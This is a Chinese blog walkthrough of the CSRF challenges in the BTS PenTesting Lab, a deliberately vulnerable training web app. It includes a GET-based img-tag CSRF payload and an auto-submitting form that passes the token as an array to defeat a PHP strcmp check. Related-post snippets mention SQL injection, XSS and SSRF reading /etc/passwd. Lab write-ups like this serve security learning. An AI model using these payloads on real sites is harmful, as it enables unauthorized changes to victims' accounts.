BTS PenTesting Lab - A8 CSRF

最新推荐文章于 2021-05-28 13:24:12 发布
最新推荐文章于 2021-05-28 13:24:12 发布
阅读量686 收藏
点赞数
分类专栏: 漏洞演练系统 文章标签: btslab 漏洞演练
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/zrools/article/details/50423781
版权

CSRF 1: Change Info

  • 源文件:/vulnerability/csrf/changeinfo.php

这里写图片描述

由于是get请求,可以使用img等标签自动加载

<img src="http://192.168.1.228/vulnerability/csrf/changeinfo.php?info=CSRF_TEST!&change=Change" />

打开效果

这里写图片描述

CSRF 2: Change Email

  • 源文件:/vulnerability/csrf/change-email.php

关键代码

这里写图片描述

strcmp()在官方的文档有这么一端说明: 

Note a difference between 5.2 and 5.3 versions

echo (int)strcmp('pending',array());
will output -1 in PHP 5.2.16 (probably in all versions prior 5.3)
but will output 0 in PHP 5.3.3

Of course, you never need to use array as a parameter in string comparisions.

(strcmp($_POST['csrf'],$_SESSION['csrf'])==0),构造表单

<form action="http://192.168.1.228/vulnerability/csrf/change-email.php" method="POST">
<input type="text" name="email" value="change@localhost"/>
<input type="hidden" name="csrf[]" value="1"/>
<input type="hidden" name="id" value="1"/>
<input type="submit" name="change" value="Change"/>
</form>

<script> document.forms[0].submit(); </script>

访问跳转显示已经修改了

这里写图片描述

zrools
关注
专栏目录
BTS PenTesting Lab - A1 Injection
zrools的博客
12-25 1125
SQL InjectionSql Injection 1 源文件:/btslab/vulnerability/ForumPosts.php # 第7行 mysql_query("DELETE from posts where postid='$id'") or die("Failed to Delete the post");# 第14行 $result=mysql_query("select *
Java Vulnerable Lab - Pentesting Lab:故意易受攻击的 Web 应用程序-开源
05-30
这是由网络安全和隐私基金会 (www.cysecurity.org) 为 Java 程序员开发的易受攻击的 Web 应用程序有关 Hacking and Securing Web Java Programs 的完整课程可在 ...
BTS Pentesting Lab:BTS Pentesting Lab-一个故意易受攻击的Web应用程序-开源
05-27
BTS PenTesting Lab是一个开放源代码的易受攻击的Web应用程序,由网络安全和隐私基金会(www.cysecurity.org)创建。 它可用于了解许多不同类型的Web应用程序漏洞。 当前,该应用包含以下类型的漏洞:* SQL注入* XSS(包括基于Flash的xss)* CSRF *点击劫持* SSRF *文件包含*代码执行*不安全的直接对象引用*不受限制的文件上传漏洞*打开URL重定向*服务器Side Includes(SSI)注入和更多...此应用程序的Java版本可在此处找到:https://sourceforge.net/p/javavulnerablelab/
BTS PenTesting Lab - A3 XSS
zrools的博客
12-26 1491
Reflected(GET)Challenge 1 源文件://btslab/vulnerability/xss/xss1.php # 第8行 <?php if(isset($_GET['keyword'])) echo "No results found for ".$_GET['keyword']?>直接echo提交过来的内容,提交<script>alert('xss');</script>地址
BTS PenTesting Lab - A7 Missing Function Level Access Control
zrools的博客
12-29 1108
功能级权限控制缺失源文件:/admin/adminlogin.php 关键代码# 第16行 $result=mysql_query("select * from users where username='$username' and password='$password' and privilege='admin' ") or die(mysql_error());;username与passw
BTS PenTesting Lab - A4 Insecure Direct Object References
zrools的博客
12-28 1012
不安全的直接对象引用 Viewing Details 源文件:/btslab/myprofile.php 关键代码地址http://192.168.1.228/myprofile.php?id=1 (需要先登录)像id=1这种容易猜测,如果没有判断权限,就容易出现信息泄露的问题,查询代码从头到尾都没有进行权限判断,只要任意登录用户都可以查询Modifying email ID 源文件:/btslab
NetSlaughter Pentesting Tool-开源
05-06
NetSlaughter是Nmap,Netcat,dsniff和tcpdump的GUI。 在Linux上运行,并用Java编码。 在接下来的修订中,我想使其成为多平台的,以便在Linux和Windows下运行
public-pentesting-reports-master.rar
05-27
经典渗透测测试报告大全,干了几年渗透测试,都是土路子,学习学习让自己更专业。
java红酒网站源码-Pentesting-Pratic-Notes:渗透测试笔记
06-05
java网站源码Pentesting Pratic Notes(备忘单) 文件检测和提取器: file targetFile strings targetFile | grep flag strings -o targetFile strings -a targetFile strings -t d targetFile strings -f ...
BTS PenTesting Lab - A10 Unvalidated Redirect & Forward..
zrools的博客
12-29 674
Open Redirect 源文件:/vulnerability/url/open.php http://192.168.1.228/vulnerability/url/open.php?u=http://www.breakthesecurity.com修改u参数就可以任意跳转,可用于钓鱼等Open Forward 源文件:/vulnerability/url/forward.php 修改u参数就可
BTS PenTesting Lab - Installation
zrools的博客
12-24 1100
漏洞类型 SQL Injection XSS(includes Flash Based xss) CSRF Clickjacking SSRF File Inclusion Code Execution Insecure Direct Object Reference Unrestricted File Upload vulnerability Open URL Redirection Server
BTS PenTesting Lab - More..
zrools的博客
12-29 866
SSRF Server-side Request Forgery源文件:/vulnerability/ssrf/ssrf.php 通过curl可获取图片,下载文件,读取文件内容等,尝试读取/etc/passwdClickjacking 源文件:/vulnerability/clickjacking/cj.php 源码就是删除自己账户,利用视觉欺骗手段,让用户在不知情的情况下,点击攻击者欺骗的位置
BTS渗透测试实验室----安装与实战
fendo
03-02 2811
一、简介 BTS渗透测试实验室是一个开放源码的脆弱的Web应用程序,创建的网络安全和隐私的基础(www.cysecurity.org)。它可以用来了解许多不同类型的Web应用程序漏洞。 目前,该应用程序包含以下类型的漏洞: ● SQL注入 ● XSS(包括Flash XSS) ● CSRF ● 点击劫持 ● SSRF ● 文件包含 ● 执行代码 ● 不安
BTS测试实验室 --- CSRF
wkend的博客
11-03 1557
0x00 什么是“CSRF”? 以下介绍来自OWASP2013 0x01 “CSRF”的发现与防止 0x02 攻击案例 0x03 CSRF 1 — 更改信息 以普通用户身份登入(这里我选择tom),进入修改个人信息修改页 输入新信息,抓包得到修改页的请求url,注意这里的请求方式是GET 接下来构造CSRF攻击,构造攻击页面, 接下来已经登录的tom去访问攻击者构造的网站 这时候t...
搭建学习环境(十三)——BTS PenTesting Lab安装及通关记录
baynk的博客
05-28 941
好久没玩综合靶场了,其实没啥欲望,挺没意思的,不过由于某些特殊原因,还是慢慢更,争取把所有的这种综合靶场都复现一遍。 安装方式还是和原来基本一样,放到lamp或者wamp环境里面,改个数据库配置文件就可以了,配置文件为config.php。 官方下载地址不记得了,就放一个自己云盘的,下载地址:提取码: 2vyi ...
测试中遇到的CSRF
Bul1et的博客
12-06 599
昨天一个测试人员给我说让我复现一个漏洞CSRF 我给他要测试账号他说不用,他给我说的原话是这样 "改了refere之后,系统依旧接收信息说明具备CSRF呀" 以前也没遇到过这种。他说是我就照着复现喽  前面改一下host地址为test.com可以证明存在http头攻击 这次改refere存在CSRF  ...
btslab全攻略——搭建安装和sql注入
小慌慌的博客
11-14 1326
一、介绍 直接引用官方说明 BTS PenTesting Lab is an open source vulnerable web application, created by Cyber Security & Privacy Foundation (www.cysecurity.org). It can be used to learn about many different types of web application vulnerabilities. Currently, th
Web渗透漏洞靶场收集
05-14 1079
“如果你想搞懂一个漏洞,比较好的方法是:你可以自己先用代码编写出这个漏洞,然后再利用它,最后再修复它”。—-摘自pikachu漏洞靶场的一句话。初学的时候玩靶场会很有意思,可以练习各种思路...
BTS指令
misterliwei的专栏
03-02 9457
BTS指令(翻译自Intel指令)BTS指令的第一个操作数称为位基址(bit base),亦称位串(bit string);第二个操作数为位偏移值(bit offset)。 BTS就是根据位偏移值从位串中取出一位放入CF中,然后将位串中的该位置成1。位基址可以为寄存器或内存寻址;位偏移值可以为寄存器或立即数: 1.  若位基址为寄存器,则BTS指令将位偏移值模(mod)16
构建高级渗透测试虚拟实验室:实践与专业技巧
《构建高级渗透测试虚拟实验室》(Building Virtual Pentesting Labs for Advanced Penetration Testing, PACKT, 2014)是一本专注于指导读者如何构建自己的虚拟渗透测试实验室的专业教材。在当前网络安全形势日益严峻...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值